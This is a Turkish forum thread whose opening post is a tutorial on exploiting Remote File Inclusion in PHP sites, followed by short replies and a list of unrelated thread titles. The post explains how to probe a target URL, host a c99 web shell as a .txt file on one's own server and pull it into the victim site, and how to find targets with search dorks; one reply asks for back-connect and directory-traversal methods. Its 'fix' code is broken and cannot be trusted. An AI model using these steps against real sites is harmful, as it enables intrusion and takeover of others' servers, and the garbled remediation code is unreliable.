-
1.
0inci sözlük hacker team kurulduTümünü Göster
Bu makalemizde size rfı, açıklarının nasıl meydana geldiğini, uzaktan dosya çağırma işlemini, shell çağırma yöntemini rfı, açığını nasıl fixleyeceğimizi (kapatabileceğimizi) kodlarla ve örneklerle anlatmaya çalışacağım.
Bildiğiniz üzere (Remota File inclusion) uzaktan dosya çağırmak anldıbına gelmektedir.
1-RFI açığı nasıl oluşur
2-Tanımlama nasıl yapılır
3-RFI Açığı Tesbiti
4-Shell Dahil Etmek
5-Örnek RFI bug
6-Örnek RFI Fix
7-RFI Açıkları nasıl bulunur.
1-Rfı açığı nasıl oluşur?
RFI, web uyguklamalarındaki hatalı kodlamadan dolayı oluşur. Bir kodla örnek verecek olursak;
include (“$haberler/spor/sanat.php); buradaki dolar işaretinden dolayı uzaktan dosya çağırma mümkündür. Kodlama bu şekilde tanımlanmadan scripte dahil edilirse, kesinlikle uzaktan dosya çağırmaya Başka bir örnekle pekiştirelim.
include
include_once
require
require_once
Scripti kodlayan kişi tanımlamadan bu kodları scripte dahil ederse, uzaktan dosya çağırma işlemi mümkün olmuş, olur.
2-Tanımlama nasıl yapılır
include ("$haberler/spor/sanat.php"); Tanımlanmamış kod.
<?php
$haberler/spor/sanat.php =’tanımlı değer’
include ("$haberler/spor/sanat.php");
?>
Bu şekilde haberler, spor, sanat üçlüsünü tanımlamış olduk.
3-Rfı açığı tespiti
Hedef siteyi açtığınızda rfı açığı olup olmadığını anlamak için siteye hata verdirmeniz, gerekmektedir
Örneğin;
http://www.hedefsite.com/articles.php?id=10
http://www.hedefsite.com/...les.php?id=http://tht.net bu şekilde yönlendirmeye çalışıyoruz. Siz istediğiniz sayfaya yönlendirebilirsiniz. Şayet cw’nin anasayfası gelirse, bu sitede rfı açığı var demektir. Bazı rfı açıklarında ise sitenin kendi üzerinde hata vermektedir. Bu sitelerde de rfı arnılabilir. Evet açığı olduğunu düşündüğümüz shell çağırma işlemimizi deneyebiliriz.
4-Shell Dahil Etmek
Burada shell çağırırken yukarıda bahsetmiş olduğumuz yönlendirme işlemini gerçekleştireceğiz. Öncelikle kendi hotsunuza txt halinde shell yüklemeniz gerekiyor. Host adresiniz free olabilir. Örneğin; c99.txt şeklinde. Daha sonra uzaktan bu txt dosyasını yönlendirme işlemi ile hedef sitemize dahil edeceğiz.
http://www.hedefsite.com/articles.ph ... z.net/c99.txt?
Evet bu şekilde sitenize yüklediğiniz txt uzantılı shell’i hedef siteye yüklemiş olursunuz.
5-Örnek Rfı bug
Eğer scriptlerde rfı bug arıyorsanız, bunları iyi bilmeniz gerekmektedir. Örnek bir rfı bug yapalım.
<?php
$page = $_GET [page]; Rfı açığı burada page değerinde
include($page);
?>
6-Örnek RFI Fix
Scriptlerdeki bugları bu konuda verilmiş örnekleri baz alarak kapatabilirsiniz.
<?php
$page = $_GET"./"; Bu kodlamalar ile rfı açığımızı fixlemiş olduk.
include($page);
?>
7-RFI Açıkları nasıl bulunur
RFI, açıklarını mevcut dorklarla ve scannerlerle bulabilirsiniz.
Örnek Dorklar;
inurl:"com_sitemap"
inurl:"com_hashcash"
inurl:"com_colophon" vs..
Ayrıca hedef site üzerinde rfı açığından şüpheleniyorsanız, scannerlerle taratabilirsiniz. Ya da örneklerlede belirttiğimiz gibi manuel açık arayabilirsiniz. Tercihinize kalmış. Şimdilik dökümanımız bu kadar. -
2.
0yazalım bakalım
-
3.
0değerlenir
-
4.
0r57-c99-c100 shelleriin panellerini göstermedikten sonra burda anlattıkların bi gibe yaramaz. dizin atlama, back connection vs. onları da yapıştır da bilgilenelim.
-
5.
0http://www.hedefsite.com/articles.php?id=10
http://www.hedefsite.com/ ... les.php?id=http:// "tht.net" bu şekilde yönlendirmeye çalışıyoruz. Siz istediğiniz sayfaya yönlendirebilirsiniz. Şayet cw’nin anasayfası gelirse, bu sitede rfı açığı var demektir. Bazı rfı açıklarında ise sitenin kendi üzerinde hata vermektedir. Bu sitelerde de rfı arnılabilir. Evet açığı olduğunu düşündüğümüz shell çağırma işlemimizi deneyebiliriz.
hıyar herif, nerden çaldın bunları bilmiyorum ama insan bi kontrol eder.
turk hack team sayfasına yönlendirme çakarken, cw nin açılmasını ancak senin gibi bir angut bekler. kapandık ama sağlık olsun; tithack giber. -
6.
0işinize yarayabilir diye düşündüm amk
-
7.
0@1 sen önce onların tanımını yap panpa yoksa kimse anlamaz
-
8.
0hacker okan ?
-
9.
0upppp upppppppppppp
-
10.
0reserved
-
souki sanayi de ne işin var
-
tyler dursun denen pkk lı orrr
-
gran torino seni parça parça yapıcamm
-
ccc rammstein ccc günaydın diler 21 01 2025
-
gran torino ya şuku atan yazar
-
ulke bitmiss
-
o gün asla gelmeyecek
-
bir tatil için baliye gitmiştimm
-
göz hakkı diye bir şey var
-
sözlükte kadın olduğunu belli etmek
-
tyler dursun bu tip ne la
-
bu adam hakkında ne düşünüyonuzzzz
-
keske sekreterim olsa
-
plakayı ruhsata işletmemişim
-
ezanlar bir saniye bile susmasın istiyorum
-
corps hanım pm kontrol et
-
cocukluk donemim mislam zehiriyle gecti
-
imş direksiyondur
-
chpyi savunan dumbki
-
mentalcel pipini boş yere kesmişler
-
din ile bilimi birleştirdim yeni bişey çıkardım
-
corps hanım meraba
-
yangında 66 kişi ölmüş
-
ayak ikinci parmagi bas parmagindan uzun olanlar
-
dayidaki malafata bak
-
madem açıyon verecen
-
az once deprem oldu binler
-
homelander acimasizca aglatiyordum ertesi
-
çaylak kokusu alıyorum
-
uykuya dalamiyoeum la
- / 2